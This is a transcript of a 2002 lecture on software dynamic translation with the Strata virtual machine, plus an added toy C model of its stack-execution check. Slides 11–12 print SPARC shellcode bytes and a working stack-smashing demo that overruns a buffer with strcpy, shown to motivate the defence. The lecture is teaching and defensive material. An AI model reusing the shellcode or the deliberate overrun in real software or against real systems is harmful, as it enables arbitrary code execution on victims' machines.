
Applications of Software Dynamic Translation

Applications of Software Dynamic Translation. Jack Davidson, University of Virginia, February 27, 2002. What is SDT? Software: implemented using flexible, software VM. Dynamic: operates on running programs. Translation: modifies some or all of a program’s instructions before they execute.


Presentation Transcript


  1. Applications of Software Dynamic Translation
     Jack Davidson, University of Virginia, February 27, 2002
     University of Virginia Department of Computer Science

  2. What is SDT?
     • Software: Implemented using flexible, software VM
     • Dynamic: Operates on running programs
     • Translation: Modifies some or all of a program’s instructions before they execute

  3. Software Dynamic Translation

  4. Why Use SDT?
     • Improve program performance
     • Adapt program to its execution environment
     • Overcome economic barriers
     • Allow one architecture’s binaries to run on another
     • Application specific ISA improvements
     • Code decompression
     • Resource management
     • Power, memory footprint, resource protection
     • Software engineering and quality control
     • Performance monitoring, fault isolation, debugging

  5. Strata
     • Infrastructure designed for building SDTs
     • Can be extended to support a wide variety of SDT applications
     • Provides:
     • Platform independent common services
     • Target interface that abstracts target-specific support functions
     • Target-specific support functions
     • SPARC and MIPS
     • ARM and x86 (underway)

  6. Strata Virtual Machine
     • Base VM implements a simple SDT
     • Programmer implements new SDTs by customizing the VM
     • VM is customized by overriding functions in the target interface

  7. Computer Viruses
     • Melissa, Code Red, Nimda, I love you
     • Cost of dealing with viruses is high
     • Code Red cost $1.2B (USA Today)
     • Melissa cost $385M (TruSecure Corp)
     • Most viruses use a buffer overrun exploit to gain control

  8. Spread of Code Red
     • Animation

  9. Hacking 101
     • Exploit lack of bounds checking in C programs
     • Malicious user provides input string that is actually code
     • Change return address to jump to malicious code by overrunning a buffer
     • Typically use strcpy(), strcat(), sprintf(), etc.

  10. Buffer Overrun Attacks

  11. Hacking 201

         #include <stdio.h>

         char shellcode[] =
           "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
           "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
           "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
           "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
           "\x91\xd0\x20\x08\x81\xc7\xe0\x08\x83\xe8\x40\x01";

  12. Hacking 201

         /* large_string, long_ptr and i are used below but their
            declarations do not appear on the slide. */
         void trustme (void) {
             unsigned buffer[24];
             printf("Evil buffer lives at %08x\n", buffer);
             /* Fill large_string with repeated copies of an address near buffer. */
             long_ptr = (long *)large_string;
             for (i=0; i<44; i++)
                 *(long_ptr+i) = ((int)buffer) - 8;
             /* Place the injected code at the start of the string. */
             for (i=0; i<(int)strlen(shellcode); i++)
                 large_string[i] = shellcode[i];
             /* Unbounded copy: overruns buffer and overwrites the return address. */
             strcpy((char *)buffer, large_string);
             return;
         }

         void naive (void) {
             trustme();
             return; /* This should execute the injected code. */
         }

         void main (int argc, char *argv[]) {
             naive();
             printf("Nothing bad happened!\n");
         }

  13. Stopping Viruses with Strata

  14. Preventing Stack Smashing Attacks with Strata

         /* Refuse to translate any instruction whose address lies in the stack. */
         insn_t my_fetch (iaddr_t PC) {
             if (in_stack(PC))
                 strata_fatal("Smash!");
             else
                 return (*SPARC_TI.fetch)(PC);
         }

      Override fetch:

         TI = SPARC_TI;
         TI.fetch = my_fetch;

  15. Strata Security API
     • With the security API a user can specify and implement security policies
     • Prevent suid programs from exec’ing a shell
     • Filter URLs
     • Sandbox file system
     • Prevent writes to specified files (e.g., registry)
     • Produce audit trails
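
The fetch override from slide 14, modelled as an added example (not code from the presentation or from Strata): a toy target interface whose fetch hook is replaced by a stack check, run over a trace in which control lands on the stack. The type and function names, the address layout and the instruction words are assumptions constructed for the illustration.

```c
#include <stdint.h>
#include <stdio.h>
/* Toy model: every name here is hypothetical, not Strata's real API. */
typedef uint32_t iaddr_t, insn_t;
typedef struct { insn_t (*fetch)(iaddr_t pc); } target_iface_t;

/* Constructed layout: a 4-word text segment and a 4-word stack region. */
#define TEXT_BASE  0x00010000u
#define STACK_BASE 0xffbefff0u
#define SEG_WORDS  4u
static const insn_t text_seg[SEG_WORDS]  = { 0x9de3bf98u, 0x01000000u, 0x81c7e008u, 0x81e80000u };
static const insn_t stack_seg[SEG_WORDS] = { 0xdeadbeefu, 0xdeadbeefu, 0xdeadbeefu, 0xdeadbeefu };
static int in_seg(iaddr_t pc, iaddr_t base) { return pc >= base && pc - base < 4u * SEG_WORDS; }
static int in_stack(iaddr_t pc) { return in_seg(pc, STACK_BASE); }

/* Base fetch: like an unchecked VM, it reads a word from any mapped address. */
static insn_t base_fetch(iaddr_t pc) {
    if (in_seg(pc, TEXT_BASE)) return text_seg[(pc - TEXT_BASE) / 4u];
    if (in_stack(pc))          return stack_seg[(pc - STACK_BASE) / 4u];
    return 0;
}
static const target_iface_t BASE_TI = { base_fetch };
static int violations;  /* a real SDT would terminate; this model counts instead */

/* Policy fetch: never hand stack-resident words to the translator. */
static insn_t checked_fetch(iaddr_t pc) {
    if (in_stack(pc)) { violations++; return 0; }
    return (*BASE_TI.fetch)(pc);
}

/* Feed a PC trace through the interface; returns how many words were fetched. */
int run_trace(const iaddr_t *pcs, int n, int use_policy) {
    target_iface_t ti = BASE_TI;               /* start from the base VM */
    if (use_policy) ti.fetch = checked_fetch;  /* override a single hook */
    violations = 0;
    int fetched = 0;
    for (int i = 0; i < n && !violations; i++)
        if (ti.fetch(pcs[i]) != 0) fetched++;
    return fetched;
}
int blocked_fetches(void) { return violations; }

/* Constructed trace: two text fetches, then control lands on the stack. */
static const iaddr_t HIJACKED[] = { TEXT_BASE, TEXT_BASE + 4u, STACK_BASE + 4u, STACK_BASE + 8u };
int main(void) {
    int open = run_trace(HIJACKED, 4, 0), guarded = run_trace(HIJACKED, 4, 1);
    printf("fetched without policy: %d, with policy: %d (blocked %d)\n", open, guarded, blocked_fetches());
    return 0;
}
```

The check sits at fetch time, so the program itself needs no recompilation or source change; the policy only sees addresses, which is why it catches execution from the stack but not other forms of control-flow hijacking.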
